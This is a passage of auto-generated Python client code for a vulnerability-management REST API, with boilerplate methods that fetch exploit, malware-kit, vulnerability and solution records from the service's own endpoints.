['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/vulnerabilities/{id}/assets', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithAssetIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_exploit(self, id, **kwargs): # noqa: E501
"""Exploit # noqa: E501
Returns the details for an exploit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploit(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the exploit. (required)
:return: Exploit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_exploit_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_exploit_with_http_info(id, **kwargs) # noqa: E501
return data
def get_exploit_with_http_info(self, id, **kwargs): # noqa: E501
"""Exploit # noqa: E501
Returns the details for an exploit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploit_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the exploit. (required)
:return: Exploit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_exploit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_exploit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/exploits/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Exploit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_exploit_vulnerabilities(self, id, **kwargs): # noqa: E501
"""Exploitable Vulnerabilities # noqa: E501
Returns the vulnerabilities exploitable to a exploit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploit_vulnerabilities(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the exploit. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_exploit_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_exploit_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
return data
def get_exploit_vulnerabilities_with_http_info(self, id, **kwargs): # noqa: E501
"""Exploitable Vulnerabilities # noqa: E501
Returns the vulnerabilities exploitable to a exploit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploit_vulnerabilities_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the exploit. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_exploit_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_exploit_vulnerabilities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/exploits/{id}/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithVulnerabilityNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_exploits(self, **kwargs): # noqa: E501
"""Exploits # noqa: E501
Returns all known exploits. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploits(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfExploit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_exploits_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_exploits_with_http_info(**kwargs) # noqa: E501
return data
def get_exploits_with_http_info(self, **kwargs): # noqa: E501
"""Exploits # noqa: E501
Returns all known exploits. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_exploits_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfExploit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_exploits" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/exploits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfExploit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_malware_kit(self, id, **kwargs): # noqa: E501
"""Malware Kit # noqa: E501
Returns the details for a malware kit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kit(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the malware kit. (required)
:return: MalwareKit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_malware_kit_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_malware_kit_with_http_info(id, **kwargs) # noqa: E501
return data
def get_malware_kit_with_http_info(self, id, **kwargs): # noqa: E501
"""Malware Kit # noqa: E501
Returns the details for a malware kit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kit_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the malware kit. (required)
:return: MalwareKit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_malware_kit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_malware_kit`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/malware_kits/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MalwareKit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_malware_kit_vulnerabilities(self, id, **kwargs): # noqa: E501
"""Malware Kit Vulnerabilities # noqa: E501
Returns the vulnerabilities that are susceptible to being attacked by a malware kit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kit_vulnerabilities(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the malware kit. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_malware_kit_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_malware_kit_vulnerabilities_with_http_info(id, **kwargs) # noqa: E501
return data
def get_malware_kit_vulnerabilities_with_http_info(self, id, **kwargs): # noqa: E501
"""Malware Kit Vulnerabilities # noqa: E501
Returns the vulnerabilities that are susceptible to being attacked by a malware kit. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kit_vulnerabilities_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: The identifier of the malware kit. (required)
:return: ReferencesWithVulnerabilityNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_malware_kit_vulnerabilities" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_malware_kit_vulnerabilities`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/malware_kits/{id}/vulnerabilities', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithVulnerabilityNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_malware_kits(self, **kwargs): # noqa: E501
"""Malware Kits # noqa: E501
Returns all known malware kits. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kits(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfMalwareKit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_malware_kits_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_malware_kits_with_http_info(**kwargs) # noqa: E501
return data
def get_malware_kits_with_http_info(self, **kwargs): # noqa: E501
"""Malware Kits # noqa: E501
Returns all known malware kits. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_malware_kits_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfMalwareKit
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_malware_kits" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/malware_kits', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PageOfMalwareKit', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_prerequisite_solutions(self, id, **kwargs): # noqa: E501
"""Solution Prerequisites # noqa: E501
Returns the solutions that must be executed in order for a solution to resolve a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_prerequisite_solutions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: ReferencesWithSolutionNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_prerequisite_solutions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_prerequisite_solutions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_prerequisite_solutions_with_http_info(self, id, **kwargs): # noqa: E501
"""Solution Prerequisites # noqa: E501
Returns the solutions that must be executed in order for a solution to resolve a vulnerability. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_prerequisite_solutions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: ReferencesWithSolutionNaturalIDLink
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_prerequisite_solutions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_prerequisite_solutions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions/{id}/prerequisites', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ReferencesWithSolutionNaturalIDLink', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_solution(self, id, **kwargs): # noqa: E501
"""Solution # noqa: E501
Returns the details for a solution that can remediate one or more vulnerabilities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_solution(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: Solution
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_solution_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_solution_with_http_info(id, **kwargs) # noqa: E501
return data
def get_solution_with_http_info(self, id, **kwargs): # noqa: E501
"""Solution # noqa: E501
Returns the details for a solution that can remediate one or more vulnerabilities. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_solution_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: Solution
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_solution" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_solution`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Solution', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_solutions(self, **kwargs): # noqa: E501
"""Solutions # noqa: E501
Returns the details for all solutions. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_solutions(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_solutions_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_solutions_with_http_info(**kwargs) # noqa: E501
return data
def get_solutions_with_http_info(self, **kwargs): # noqa: E501
"""Solutions # noqa: E501
Returns the details for all solutions. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_solutions_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['page', 'size', 'sort'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_solutions" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
if 'size' in params:
query_params.append(('size', params['size'])) # noqa: E501
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
collection_formats['sort'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourcesSolution', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_superseded_solutions(self, id, **kwargs): # noqa: E501
"""Superseded Solutions # noqa: E501
Returns the solutions that are superseded by this solution. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_superseded_solutions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_superseded_solutions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_superseded_solutions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_superseded_solutions_with_http_info(self, id, **kwargs): # noqa: E501
"""Superseded Solutions # noqa: E501
Returns the solutions that are superseded by this solution. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_superseded_solutions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_superseded_solutions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_superseded_solutions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions/{id}/supersedes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourcesSolution', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_superseding_solutions(self, id, **kwargs): # noqa: E501
"""Superseding Solutions # noqa: E501
Returns the solutions that supersede this solution. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_superseding_solutions(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:param bool rollup: Whether to return only highest-level \"rollup\" superseding solutions.
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_superseding_solutions_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_superseding_solutions_with_http_info(id, **kwargs) # noqa: E501
return data
def get_superseding_solutions_with_http_info(self, id, **kwargs): # noqa: E501
"""Superseding Solutions # noqa: E501
Returns the solutions that supersede this solution. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_superseding_solutions_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: The identifier of the solution. (required)
:param bool rollup: Whether to return only highest-level \"rollup\" superseding solutions.
:return: ResourcesSolution
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'rollup'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_superseding_solutions" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `get_superseding_solutions`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'rollup' in params:
query_params.append(('rollup', params['rollup'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json;charset=UTF-8']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/3/solutions/{id}/superseding', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResourcesSolution', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_vulnerabilities(self, **kwargs): # noqa: E501
"""Vulnerabilities # noqa: E501
Returns all vulnerabilities that can be assessed during a scan. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerabilities(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
:param list[str] sort: The criteria to sort the records by, in the format: `property[,ASC|DESC]`. The default sort order is ascending. Multiple sort criteria can be specified using multiple sort query parameters.
:return: PageOfVulnerability
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_vulnerabilities_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_vulnerabilities_with_http_info(**kwargs) # noqa: E501
return data
def get_vulnerabilities_with_http_info(self, **kwargs): # noqa: E501
"""Vulnerabilities # noqa: E501
Returns all vulnerabilities that can be assessed during a scan. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_vulnerabilities_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page: The index of the page (zero-based) to retrieve.
:param int size: The number of records per page to retrieve.
